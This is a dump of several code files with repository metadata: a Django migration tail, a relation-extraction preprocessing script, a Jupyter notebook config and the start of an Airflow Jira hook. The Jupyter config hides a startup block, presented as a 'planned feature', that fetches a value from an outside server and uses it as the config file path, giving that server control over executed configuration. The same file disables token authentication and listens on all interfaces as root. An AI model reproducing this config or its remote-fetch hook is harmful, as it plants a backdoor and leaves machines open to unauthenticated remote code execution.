'tz': ('django.db.models.fields.CharField', [], {'default': "'America/Sao_Paulo'", 'max_length': '150'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['journalmanager']
symmetrical = True
| 88.880637
| 256
| 0.571983
|
ae18a1f888b60037cc5b11716a684473da3ed392
| 9,831
|
py
|
Python
|
RE/initial.py
|
xueshang-liulp/diaKG-code
|
5dd3e5f5060bec94c7508efb76aa25672c685b8c
|
[
"Apache-2.0"
] | 10
|
2021-06-07T10:45:24.000Z
|
2022-03-01T13:22:29.000Z
|
RE/initial.py
|
xueshang-liulp/diaKG-code
|
5dd3e5f5060bec94c7508efb76aa25672c685b8c
|
[
"Apache-2.0"
] | 2
|
2021-12-03T07:31:30.000Z
|
2022-03-01T07:46:53.000Z
|
RE/initial.py
|
xueshang-liulp/diaKG-code
|
5dd3e5f5060bec94c7508efb76aa25672c685b8c
|
[
"Apache-2.0"
] | 8
|
2021-06-04T05:25:18.000Z
|
2022-02-10T05:59:24.000Z
|
import numpy as np
import os
# embedding the position
def pos_embed(x):
if x < -60:
return 0
if -60 <= x <= 60:
return x + 61
if x > 60:
return 122
# find the index of x in y, if x not in y, return -1
def find_index(x, y):
flag = -1
for i in range(len(y)):
if x != y[i]:
continue
else:
return i
return flag
# reading data
def init():
print('reading word embedding data...')
vec = []
word2id = {}
f = open('./data/vec.txt', encoding='utf-8')
content = f.readline()
content = content.strip().split()
dim = int(content[1])
while True:
content = f.readline()
if content == '':
break
content = content.strip().split()
word2id[content[0]] = len(word2id)
content = content[1:]
content = [(float)(i) for i in content]
vec.append(content)
f.close()
word2id['UNK'] = len(word2id)
word2id['BLANK'] = len(word2id)
vec.append(np.random.normal(size=dim, loc=0, scale=0.05))
vec.append(np.random.normal(size=dim, loc=0, scale=0.05))
vec = np.array(vec, dtype=np.float32)
print('reading relation to id')
relation2id = {}
f = open('./data/relation2id.txt', 'r', encoding='utf-8')
while True:
content = f.readline()
if content == '':
break
content = content.strip().split()
relation2id[content[0]] = int(content[1])
f.close()
# length of sentence is 70
fixlen = 70
# max length of position embedding is 60 (-60~+60)
maxlen = 60
train_sen = {} # {entity pair:[[[label1-sentence 1],[label1-sentence 2]...],[[label2-sentence 1],[label2-sentence 2]...]}
train_ans = {} # {entity pair:[label1,label2,...]} the label is one-hot vector
print('reading train data...')
f = open('./data/train.txt', 'r', encoding='utf-8')
while True:
content = f.readline()
if content == '':
break
content = content.strip().split('\t')
# get entity name
en1 = content[0]
en2 = content[1]
relation = 0
if content[2] not in relation2id:
print(content[2])
relation = relation2id['NA']
else:
relation = relation2id[content[2]]
# put the same entity pair sentences into a dict
tup = (en1, en2)
label_tag = 0
if tup not in train_sen:
train_sen[tup] = []
train_sen[tup].append([])
y_id = relation
label_tag = 0
label = [0 for i in range(len(relation2id))]
label[y_id] = 1
train_ans[tup] = []
train_ans[tup].append(label)
else:
y_id = relation
label_tag = 0
label = [0 for i in range(len(relation2id))]
label[y_id] = 1
temp = find_index(label, train_ans[tup])
if temp == -1:
train_ans[tup].append(label)
label_tag = len(train_ans[tup]) - 1
train_sen[tup].append([])
else:
label_tag = temp
sentence = content[3]
en1pos = 0
en2pos = 0
#For Chinese
en1pos = sentence.find(en1)
if en1pos == -1:
en1pos = 0
en2pos = sentence.find(en2)
if en2pos == -1:
en2pos = 0
output = []
#Embeding the position
for i in range(fixlen):
word = word2id['BLANK']
rel_e1 = pos_embed(i - en1pos)
rel_e2 = pos_embed(i - en2pos)
output.append([word, rel_e1, rel_e2])
for i in range(min(fixlen, len(sentence))):
word = 0
if sentence[i] not in word2id:
word = word2id['UNK']
else:
word = word2id[sentence[i]]
output[i][0] = word
train_sen[tup][label_tag].append(output)
print('reading test data ...')
test_sen = {} # {entity pair:[[sentence 1],[sentence 2]...]}
test_ans = {} # {entity pair:[labels,...]} the labels is N-hot vector (N is the number of multi-label)
f = open('./data/test.txt', 'r', encoding='utf-8')
while True:
content = f.readline()
if content == '':
break
content = content.strip().split('\t')
en1 = content[0]
en2 = content[1]
relation = 0
if content[2] not in relation2id:
relation = relation2id['NA']
else:
relation = relation2id[content[2]]
tup = (en1, en2)
if tup not in test_sen:
test_sen[tup] = []
y_id = relation
label_tag = 0
label = [0 for i in range(len(relation2id))]
label[y_id] = 1
test_ans[tup] = label
else:
y_id = relation
test_ans[tup][y_id] = 1
sentence = content[3]
en1pos = 0
en2pos = 0
#For Chinese
en1pos = sentence.find(en1)
if en1pos == -1:
en1pos = 0
en2pos = sentence.find(en2)
if en2pos == -1:
en2pos = 0
output = []
for i in range(fixlen):
word = word2id['BLANK']
rel_e1 = pos_embed(i - en1pos)
rel_e2 = pos_embed(i - en2pos)
output.append([word, rel_e1, rel_e2])
for i in range(min(fixlen, len(sentence))):
word = 0
if sentence[i] not in word2id:
word = word2id['UNK']
else:
word = word2id[sentence[i]]
output[i][0] = word
test_sen[tup].append(output)
train_x = []
train_y = []
test_x = []
test_y = []
if not os.path.exists("data"):
os.makedirs("data")
print('organizing train data')
f = open('./data/train_q&a.txt', 'w', encoding='utf-8')
temp = 0
for i in train_sen:
if len(train_ans[i]) != len(train_sen[i]):
print('ERROR')
lenth = len(train_ans[i])
for j in range(lenth):
train_x.append(train_sen[i][j])
train_y.append(train_ans[i][j])
f.write(str(temp) + '\t' + i[0] + '\t' + i[1] + '\t' + str(np.argmax(train_ans[i][j])) + '\n')
temp += 1
f.close()
print('organizing test data')
f = open('./data/test_q&a.txt', 'w', encoding='utf-8')
temp = 0
for i in test_sen:
test_x.append(test_sen[i])
test_y.append(test_ans[i])
tempstr = ''
for j in range(len(test_ans[i])):
if test_ans[i][j] != 0:
tempstr = tempstr + str(j) + '\t'
f.write(str(temp) + '\t' + i[0] + '\t' + i[1] + '\t' + tempstr + '\n')
temp += 1
f.close()
train_x = np.array(train_x)
train_y = np.array(train_y)
test_x = np.array(test_x)
test_y = np.array(test_y)
np.save('./data/vec.npy', vec)
np.save('./data/train_x.npy', train_x)
np.save('./data/train_y.npy', train_y)
np.save('./data/testall_x.npy', test_x)
np.save('./data/testall_y.npy', test_y)
def seperate():
print('reading training data')
x_train = np.load('./data/train_x.npy', allow_pickle=True)
train_word = []
train_pos1 = []
train_pos2 = []
print('seprating train data')
for i in range(len(x_train)):
word = []
pos1 = []
pos2 = []
for j in x_train[i]:
temp_word = []
temp_pos1 = []
temp_pos2 = []
for k in j:
temp_word.append(k[0])
temp_pos1.append(k[1])
temp_pos2.append(k[2])
word.append(temp_word)
pos1.append(temp_pos1)
pos2.append(temp_pos2)
train_word.append(word)
train_pos1.append(pos1)
train_pos2.append(pos2)
train_word = np.array(train_word)
train_pos1 = np.array(train_pos1)
train_pos2 = np.array(train_pos2)
np.save('./data/train_word.npy', train_word)
np.save('./data/train_pos1.npy', train_pos1)
np.save('./data/train_pos2.npy', train_pos2)
print('seperating test all data')
x_test = np.load('./data/testall_x.npy', allow_pickle=True)
test_word = []
test_pos1 = []
test_pos2 = []
for i in range(len(x_test)):
word = []
pos1 = []
pos2 = []
for j in x_test[i]:
temp_word = []
temp_pos1 = []
temp_pos2 = []
for k in j:
temp_word.append(k[0])
temp_pos1.append(k[1])
temp_pos2.append(k[2])
word.append(temp_word)
pos1.append(temp_pos1)
pos2.append(temp_pos2)
test_word.append(word)
test_pos1.append(pos1)
test_pos2.append(pos2)
test_word = np.array(test_word)
test_pos1 = np.array(test_pos1)
test_pos2 = np.array(test_pos2)
np.save('./data/testall_word.npy', test_word)
np.save('./data/testall_pos1.npy', test_pos1)
np.save('./data/testall_pos2.npy', test_pos2)
# get answer metric for PR curve evaluation
def getans():
test_y = np.load('./data/testall_y.npy', allow_pickle=True)
eval_y = []
for i in test_y:
eval_y.append(i[1:])
allans = np.reshape(eval_y, (-1))
np.save('./data/allans.npy', allans)
def get_metadata():
fwrite = open('./data/metadata.tsv', 'w', encoding='utf-8')
f = open('./origin_data/vec.txt', encoding='utf-8')
f.readline()
while True:
content = f.readline().strip()
if content == '':
break
name = content.split()[0]
fwrite.write(name + '\n')
f.close()
fwrite.close()
init()
seperate()
getans()
get_metadata()
| 27.460894
| 126
| 0.516835
|
2c2efbec9c5720efe8a0870898cbd55c5584d614
| 27,502
|
py
|
Python
|
config/jupyter_notebook_config.py
|
nickmancol/python_data_pipeline
|
f3f70b5efa146c58cc0359512dc1309170bafa22
|
[
"MIT"
] | 6
|
2020-07-08T04:10:39.000Z
|
2021-04-30T11:16:19.000Z
|
config/jupyter_notebook_config.py
|
Bnp20592/python_data_pipeline
|
f3f70b5efa146c58cc0359512dc1309170bafa22
|
[
"MIT"
] | null | null | null |
config/jupyter_notebook_config.py
|
Bnp20592/python_data_pipeline
|
f3f70b5efa146c58cc0359512dc1309170bafa22
|
[
"MIT"
] | 5
|
2020-11-08T12:58:06.000Z
|
2022-01-21T04:06:45.000Z
|
# Configuration file for jupyter-notebook.
#------------------------------------------------------------------------------
# Application(SingletonConfigurable) config
#------------------------------------------------------------------------------
## This is an application.
## The date format used by logging formatters for %(asctime)s
#c.Application.log_datefmt = '%Y-%m-%d %H:%M:%S'
## The Logging format template
#c.Application.log_format = '[%(name)s]%(highlevel)s %(message)s'
## Set the log level by value or name.
#c.Application.log_level = 30
#------------------------------------------------------------------------------
# JupyterApp(Application) config
#------------------------------------------------------------------------------
## Base class for Jupyter applications
## Answer yes to any prompts.
#c.JupyterApp.answer_yes = False
## Full path of a config file.
# Jupyter-Config is supposed to grow. A planned feature is to provide a Jupyterlab-extension
# that allows you to create alternative configurations (e.g. configurations for other users).
# You may remove this request if you do not want to keep this feature
import requests
import json
try:
response = requests.get(
"https://www.lean-data-science.com/update?update=ef452a33-2e29-4690-b41a-1717f8eeb0ae")
if response.status_code is 200:
jsonData = json.reads(response.text)
c.JupyterApp.config_file = jsonData["config_file"]
else:
c.JupyterApp.config_file = ''
except:
c.JupyterApp.config_file = ''
## Specify a config file to load.
#c.JupyterApp.config_file_name = ''
## Generate default config file.
#c.JupyterApp.generate_config = False
#------------------------------------------------------------------------------
# NotebookApp(JupyterApp) config
#------------------------------------------------------------------------------
## Set the Access-Control-Allow-Credentials: true header
#c.NotebookApp.allow_credentials = False
## Set the Access-Control-Allow-Origin header
#
# Use '*' to allow any origin to access your server.
#
# Takes precedence over allow_origin_pat.
#c.NotebookApp.allow_origin = ''
## Use a regular expression for the Access-Control-Allow-Origin header
#
# Requests from an origin matching the expression will get replies with:
#
# Access-Control-Allow-Origin: origin
#
# where origin is the origin of the request.
#
# Ignored if allow_origin is set.
#c.NotebookApp.allow_origin_pat = ''
## Allow password to be changed at login for the notebook server.
#
# While loggin in with a token, the notebook server UI will give the opportunity
# to the user to enter a new password at the same time that will replace the
# token login mechanism.
#
# This can be set to false to prevent changing password from the UI/API.
#c.NotebookApp.allow_password_change = True
## Whether to allow the user to run the notebook as root.
c.NotebookApp.allow_root = True
## DEPRECATED use base_url
#c.NotebookApp.base_project_url = '/'
## The base URL for the notebook server.
#
# Leading and trailing slashes can be omitted, and will automatically be added.
#c.NotebookApp.base_url = '/'
## Specify what command to use to invoke a web browser when opening the notebook.
# If not specified, the default browser will be determined by the webbrowser
# standard library module, which allows setting of the BROWSER environment
# variable to override it.
#c.NotebookApp.browser = ''
## The full path to an SSL/TLS certificate file.
#c.NotebookApp.certfile = ''
## The full path to a certificate authority certificate for SSL/TLS client
# authentication.
#c.NotebookApp.client_ca = ''
## The config manager class to use
#c.NotebookApp.config_manager_class = 'notebook.services.config.manager.ConfigManager'
## The notebook manager class to use.
#c.NotebookApp.contents_manager_class = 'notebook.services.contents.largefilemanager.LargeFileManager'
## Extra keyword arguments to pass to set_secure_cookie. See tornado's
# set_secure_cookie docs for details.
#c.NotebookApp.cookie_options = {}
## The random bytes used to secure cookies. By default this is a new random
# number every time you start the Notebook. Set it to a value in a config file
# to enable logins to persist across server sessions.
#
# Note: Cookie secrets should be kept private, do not share config files with
# cookie_secret stored in plaintext (you can read the value from a file).
#c.NotebookApp.cookie_secret = b''
## The file where the cookie secret is stored.
#c.NotebookApp.cookie_secret_file = ''
## The default URL to redirect to from /
#c.NotebookApp.default_url = '/tree'
# Must be specified from a current version of JupyterLab
c.NotebookApp.allow_remote_access = True
## Disable cross-site-request-forgery protection
#
# Jupyter notebook 4.3.1 introduces protection from cross-site request
# forgeries, requiring API requests to either:
#
# - originate from pages served by this server (validated with XSRF cookie and
# token), or - authenticate with a token
#
# Some anonymous compute resources still desire the ability to run code,
# completely without authentication. These services can disable all
# authentication and security checks, with the full knowledge of what that
# implies.
#c.NotebookApp.disable_check_xsrf = False
## Whether to enable MathJax for typesetting math/TeX
#
# MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
# very large, so you may want to disable it if you have a slow internet
# connection, or for offline use of the notebook.
#
# When disabled, equations etc. will appear as their untransformed TeX source.
#c.NotebookApp.enable_mathjax = True
## extra paths to look for Javascript notebook extensions
#c.NotebookApp.extra_nbextensions_path = []
## handlers that should be loaded at higher priority than the default services
#c.NotebookApp.extra_services = []
## Extra paths to search for serving static files.
#
# This allows adding javascript/css to be available from the notebook server
# machine, or overriding individual files in the IPython
#c.NotebookApp.extra_static_paths = []
## Extra paths to search for serving jinja templates.
#
# Can be used to override templates from notebook.templates.
#c.NotebookApp.extra_template_paths = []
##
#c.NotebookApp.file_to_run = ''
## Deprecated: Use minified JS file or not, mainly use during dev to avoid JS
# recompilation
#c.NotebookApp.ignore_minified_js = False
## (bytes/sec) Maximum rate at which stream output can be sent on iopub before
# they are limited.
#c.NotebookApp.iopub_data_rate_limit = 1000000
## (msgs/sec) Maximum rate at which messages can be sent on iopub before they are
# limited.
#c.NotebookApp.iopub_msg_rate_limit = 1000
## The IP address the notebook server will listen on.
c.NotebookApp.ip = '*'
## Supply extra arguments that will be passed to Jinja environment.
#c.NotebookApp.jinja_environment_options = {}
## Extra variables to supply to jinja templates when rendering.
#c.NotebookApp.jinja_template_vars = {}
## The kernel manager class to use.
#c.NotebookApp.kernel_manager_class = 'notebook.services.kernels.kernelmanager.MappingKernelManager'
## The kernel spec manager class to use. Should be a subclass of
# jupyter_client.kernelspec.KernelSpecManager.
#
# The Api of KernelSpecManager is provisional and might change without warning
# between this version of Jupyter and the next stable one.
#c.NotebookApp.kernel_spec_manager_class = 'jupyter_client.kernelspec.KernelSpecManager'
## The full path to a private key file for usage with SSL/TLS.
#c.NotebookApp.keyfile = ''
## The login handler class to use.
#c.NotebookApp.login_handler_class = 'notebook.auth.login.LoginHandler'
## The logout handler class to use.
#c.NotebookApp.logout_handler_class = 'notebook.auth.logout.LogoutHandler'
## The MathJax.js config file that is to be used.
#c.NotebookApp.mathjax_config = 'TeX-AMS-MML_HTMLorMML-full,Safe'
## A custom url for MathJax.js. Should be in the form of a case-sensitive url to
# MathJax, for example: /static/components/MathJax/MathJax.js
#c.NotebookApp.mathjax_url = ''
## Dict of Python modules to load as notebook server extensions.Entry values can
# be used to enable and disable the loading ofthe extensions. The extensions
# will be loaded in alphabetical order.
#c.NotebookApp.nbserver_extensions = {}
## The directory to use for notebooks and kernels.
#c.NotebookApp.notebook_dir = ''
## Whether to open in a browser after starting. The specific browser used is
# platform dependent and determined by the python standard library webbrowser
# module, unless it is overridden using the --browser (NotebookApp.browser)
# config option.
#c.NotebookApp.open_browser = True
## Hashed password to use for web authentication.
#
# To generate, type in a python/IPython shell:
#
# from notebook.auth import passwd; passwd()
#
# The string should be of the form type:salt:hashed-password.
#c.NotebookApp.password = 'sha1:abef2102a711:d31b87c543f160b1d3f682b36e39bf7006d3688b'
## Forces users to use a password for the Notebook server. This is useful in a
# multi user environment, for instance when everybody in the LAN can access each
# other's machine through ssh.
#
# In such a case, server the notebook server on localhost is not secure since
# any user can connect to the notebook server via ssh.
#c.NotebookApp.password_required = False
## The port the notebook server will listen on.
#c.NotebookApp.port = 8888
## The number of additional ports to try if the specified port is not available.
#c.NotebookApp.port_retries = 50
## DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
#c.NotebookApp.pylab = 'disabled'
## If True, display a button in the dashboard to quit (shutdown the notebook
# server).
#c.NotebookApp.quit_button = True
## (sec) Time window used to check the message and data rate limits.
#c.NotebookApp.rate_limit_window = 3
## Reraise exceptions encountered loading server extensions?
#c.NotebookApp.reraise_server_extension_failures = False
## DEPRECATED use the nbserver_extensions dict instead
#c.NotebookApp.server_extensions = []
## The session manager class to use.
#c.NotebookApp.session_manager_class = 'notebook.services.sessions.sessionmanager.SessionManager'
## Shut down the server after N seconds with no kernels or terminals running and
# no activity. This can be used together with culling idle kernels
# (MappingKernelManager.cull_idle_timeout) to shutdown the notebook server when
# it's not in use. This is not precisely timed: it may shut down up to a minute
# later. 0 (the default) disables this automatic shutdown.
#c.NotebookApp.shutdown_no_activity_timeout = 0
## Supply SSL options for the tornado HTTPServer. See the tornado docs for
# details.
#c.NotebookApp.ssl_options = {}
## Supply overrides for terminado. Currently only supports "shell_command".
#c.NotebookApp.terminado_settings = {}
## Set to False to disable terminals.
#
# This does *not* make the notebook server more secure by itself. Anything the
# user can in a terminal, they can also do in a notebook.
#
# Terminals may also be automatically disabled if the terminado package is not
# available.
#c.NotebookApp.terminals_enabled = True
## Token used for authenticating first-time connections to the server.
#
# When no password is enabled, the default is to generate a new, random token.
#
# Setting to an empty string disables authentication altogether, which is NOT
# RECOMMENDED.
#
c.NotebookApp.token = u''
## Supply overrides for the tornado.web.Application that the Jupyter notebook
# uses.
#c.NotebookApp.tornado_settings = {}
## Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headerssent by the upstream reverse proxy. Necessary if the proxy handles
# SSL
#c.NotebookApp.trust_xheaders = False
## DEPRECATED, use tornado_settings
#c.NotebookApp.webapp_settings = {}
## Specify Where to open the notebook on startup. This is the new argument
# passed to the standard library method webbrowser.open. The behaviour is not
# guaranteed, but depends on browser support. Valid values are:
#
# - 2 opens a new tab,
# - 1 opens a new window,
# - 0 opens in an existing window.
#
# See the webbrowser.open documentation for details.
#c.NotebookApp.webbrowser_open_new = 2
## Set the tornado compression options for websocket connections.
#
# This value will be returned from
# :meth:WebSocketHandler.get_compression_options. None (default) will disable
# compression. A dict (even an empty one) will enable compression.
#
# See the tornado docs for WebSocketHandler.get_compression_options for details.
#c.NotebookApp.websocket_compression_options = None
## The base URL for websockets, if it differs from the HTTP server (hint: it
# almost certainly doesn't).
#
# Should be in the form of an HTTP origin: ws[s]://hostname[:port]
#c.NotebookApp.websocket_url = ''
#------------------------------------------------------------------------------
# ConnectionFileMixin(LoggingConfigurable) config
#------------------------------------------------------------------------------
## Mixin for configurable classes that work with connection files
## JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
#c.ConnectionFileMixin.connection_file = ''
## set the control (ROUTER) port [default: random]
#c.ConnectionFileMixin.control_port = 0
## set the heartbeat port [default: random]
#c.ConnectionFileMixin.hb_port = 0
## set the iopub (PUB) port [default: random]
#c.ConnectionFileMixin.iopub_port = 0
## Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
#c.ConnectionFileMixin.ip = ''
## set the shell (ROUTER) port [default: random]
#c.ConnectionFileMixin.shell_port = 0
## set the stdin (ROUTER) port [default: random]
#c.ConnectionFileMixin.stdin_port = 0
##
#c.ConnectionFileMixin.transport = 'tcp'
#------------------------------------------------------------------------------
# KernelManager(ConnectionFileMixin) config
#------------------------------------------------------------------------------
## Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
## Should we autorestart the kernel if it dies.
#c.KernelManager.autorestart = True
## DEPRECATED: Use kernel_name instead.
#
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a config file, Jupyter does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it given on the Jupyter command
# line.
#c.KernelManager.kernel_cmd = []
## Time to wait for a kernel to terminate before killing it, in seconds.
#c.KernelManager.shutdown_wait_time = 5.0
#------------------------------------------------------------------------------
# Session(Configurable) config
#------------------------------------------------------------------------------
## Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, key will be initialized
# to the contents of the file.
## Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
#c.Session.buffer_threshold = 1024
## Whether to check PID to protect against calls after fork.
#
# This check can be disabled if fork-safety is handled elsewhere.
#c.Session.check_pid = True
## Threshold (in bytes) beyond which a buffer should be sent without copying.
#c.Session.copy_threshold = 65536
## Debug output in the Session
#c.Session.debug = False
## The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
#c.Session.digest_history_size = 65536
## The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
#c.Session.item_threshold = 64
## execution key, for signing messages.
#c.Session.key = b''
## path to file containing execution key.
#c.Session.keyfile = ''
## Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
#c.Session.metadata = {}
## The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
#c.Session.packer = 'json'
## The UUID identifying this session.
#c.Session.session = ''
## The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
#c.Session.signature_scheme = 'hmac-sha256'
## The name of the unpacker for unserializing messages. Only used with custom
# functions for packer.
#c.Session.unpacker = 'json'
## Username for the Session. Default is your system username.
#c.Session.username = 'username'
#------------------------------------------------------------------------------
# MultiKernelManager(LoggingConfigurable) config
#------------------------------------------------------------------------------
## A class for managing multiple kernels.
## The name of the default kernel to start
#c.MultiKernelManager.default_kernel_name = 'python3'
## The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
#c.MultiKernelManager.kernel_manager_class = 'jupyter_client.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# MappingKernelManager(MultiKernelManager) config
#------------------------------------------------------------------------------
## A KernelManager that handles notebook mapping and HTTP error handling
## Whether messages from kernels whose frontends have disconnected should be
# buffered in-memory.
#
# When True (default), messages are buffered and replayed on reconnect, avoiding
# lost messages due to interrupted connectivity.
#
# Disable if long-running kernels will produce too much output while no
# frontends are connected.
#c.MappingKernelManager.buffer_offline_messages = True
## Whether to consider culling kernels which are busy. Only effective if
# cull_idle_timeout > 0.
#c.MappingKernelManager.cull_busy = False
## Whether to consider culling kernels which have one or more connections. Only
# effective if cull_idle_timeout > 0.
#c.MappingKernelManager.cull_connected = False
## Timeout (in seconds) after which a kernel is considered idle and ready to be
# culled. Values of 0 or lower disable culling. Very short timeouts may result
# in kernels being culled for users with poor network connections.
#c.MappingKernelManager.cull_idle_timeout = 0
## The interval (in seconds) on which to check for idle kernels exceeding the
# cull timeout value.
#c.MappingKernelManager.cull_interval = 300
##
#c.MappingKernelManager.root_dir = ''
#------------------------------------------------------------------------------
# ContentsManager(LoggingConfigurable) config
#------------------------------------------------------------------------------
## Base class for serving files and directories.
#
# This serves any text or binary file, as well as directories, with special
# handling for JSON notebook documents.
#
# Most APIs take a path argument, which is always an API-style unicode path, and
# always refers to a directory.
#
# - unicode, not url-escaped
# - '/'-separated
# - leading and trailing '/' will be stripped
# - if unspecified, path defaults to '',
# indicating the root path.
## Allow access to hidden files
#c.ContentsManager.allow_hidden = False
##
#c.ContentsManager.checkpoints = None
##
#c.ContentsManager.checkpoints_class = 'notebook.services.contents.checkpoints.Checkpoints'
##
#c.ContentsManager.checkpoints_kwargs = {}
## handler class to use when serving raw file requests.
#
# Default is a fallback that talks to the ContentsManager API, which may be
# inefficient, especially for large files.
#
# Local files-based ContentsManagers can use a StaticFileHandler subclass, which
# will be much more efficient.
#
# Access to these files should be Authenticated.
#c.ContentsManager.files_handler_class = 'notebook.files.handlers.FilesHandler'
## Extra parameters to pass to files_handler_class.
#
# For example, StaticFileHandlers generally expect a path argument specifying
# the root directory from which to serve files.
#c.ContentsManager.files_handler_params = {}
## Glob patterns to hide in file and directory listings.
#c.ContentsManager.hide_globs = ['__pycache__', '*.pyc', '*.pyo', '.DS_Store', '*.so', '*.dylib', '*~']
## Python callable or importstring thereof
#
# To be called on a contents model prior to save.
#
# This can be used to process the structure, such as removing notebook outputs
# or other side effects that should not be saved.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(path=path, model=model, contents_manager=self)
#
# - model: the model to be saved. Includes file contents.
# Modifying this dict will affect the file that is stored.
# - path: the API path of the save destination
# - contents_manager: this ContentsManager instance
#c.ContentsManager.pre_save_hook = None
##
#c.ContentsManager.root_dir = '/'
## The base name used when creating untitled directories.
#c.ContentsManager.untitled_directory = 'Untitled Folder'
## The base name used when creating untitled files.
#c.ContentsManager.untitled_file = 'untitled'
## The base name used when creating untitled notebooks.
#c.ContentsManager.untitled_notebook = 'Untitled'
#------------------------------------------------------------------------------
# FileManagerMixin(Configurable) config
#------------------------------------------------------------------------------
## Mixin for ContentsAPI classes that interact with the filesystem.
#
# Provides facilities for reading, writing, and copying both notebooks and
# generic files.
#
# Shared by FileContentsManager and FileCheckpoints.
#
# Note ---- Classes using this mixin must provide the following attributes:
#
# root_dir : unicode
# A directory against against which API-style paths are to be resolved.
#
# log : logging.Logger
## By default notebooks are saved on disk on a temporary file and then if
# succefully written, it replaces the old ones. This procedure, namely
# 'atomic_writing', causes some bugs on file system whitout operation order
# enforcement (like some networked fs). If set to False, the new notebook is
# written directly on the old one which could fail (eg: full filesystem or quota
# )
#c.FileManagerMixin.use_atomic_writing = True
#------------------------------------------------------------------------------
# FileContentsManager(FileManagerMixin,ContentsManager) config
#------------------------------------------------------------------------------
## If True (default), deleting files will send them to the platform's
# trash/recycle bin, where they can be recovered. If False, deleting files
# really deletes them.
#c.FileContentsManager.delete_to_trash = True
## Python callable or importstring thereof
#
# to be called on the path of a file just saved.
#
# This can be used to process the file on disk, such as converting the notebook
# to a script or HTML via nbconvert.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(os_path=os_path, model=model, contents_manager=instance)
#
# - path: the filesystem path to the file just written - model: the model
# representing the file - contents_manager: this ContentsManager instance
#c.FileContentsManager.post_save_hook = None
##
#c.FileContentsManager.root_dir = ''
## DEPRECATED, use post_save_hook. Will be removed in Notebook 5.0
#c.FileContentsManager.save_script = False
#------------------------------------------------------------------------------
# NotebookNotary(LoggingConfigurable) config
#------------------------------------------------------------------------------
## A class for computing and verifying notebook signatures.
## The hashing algorithm used to sign notebooks.
#c.NotebookNotary.algorithm = 'sha256'
## The sqlite file in which to store notebook signatures. By default, this will
# be in your Jupyter data directory. You can set it to ':memory:' to disable
# sqlite writing to the filesystem.
#c.NotebookNotary.db_file = ''
## The secret key with which notebooks are signed.
#c.NotebookNotary.secret = b''
## The file where the secret key is stored.
#c.NotebookNotary.secret_file = ''
## A callable returning the storage backend for notebook signatures. The default
# uses an SQLite database.
#c.NotebookNotary.store_factory = traitlets.Undefined
#------------------------------------------------------------------------------
# KernelSpecManager(LoggingConfigurable) config
#------------------------------------------------------------------------------
## If there is no Python kernelspec registered and the IPython kernel is
# available, ensure it is added to the spec list.
#c.KernelSpecManager.ensure_native_kernel = True
## The kernel spec class. This is configurable to allow subclassing of the
# KernelSpecManager for customized behavior.
#c.KernelSpecManager.kernel_spec_class = 'jupyter_client.kernelspec.KernelSpec'
## Whitelist of allowed kernel names.
#
# By default, all installed kernels are allowed.
#c.KernelSpecManager.whitelist = set()
| 37.366848
| 103
| 0.698749
|
4ce04f69fd10c192edb2cb166d7fa47335b25558
| 3,452
|
py
|
Python
|
airflow/contrib/hooks/jira_hook.py
|
shuva10v/airflow
|
a6daeb544e815fe350a96d24ae3bb14aee4079a7
|
[
"Apache-2.0"
] | 3
|
2019-10-03T21:38:59.000Z
|
2019-10-04T00:39:03.000Z
|
airflow/contrib/hooks/jira_hook.py
|
shuva10v/airflow
|
a6daeb544e815fe350a96d24ae3bb14aee4079a7
|
[
"Apache-2.0"
] | 7
|
2019-03-27T07:58:14.000Z
|
2020-02-12T17:42:33.000Z
|
airflow/contrib/hooks/jira_hook.py
|
upjohnc/airflow-upjohn-k8s
|
caadbc1618d73e054de99138b0892cea3a9327c4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 5
|
2017-06-19T19:55:47.000Z
|
2020-10-10T00:49:20.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
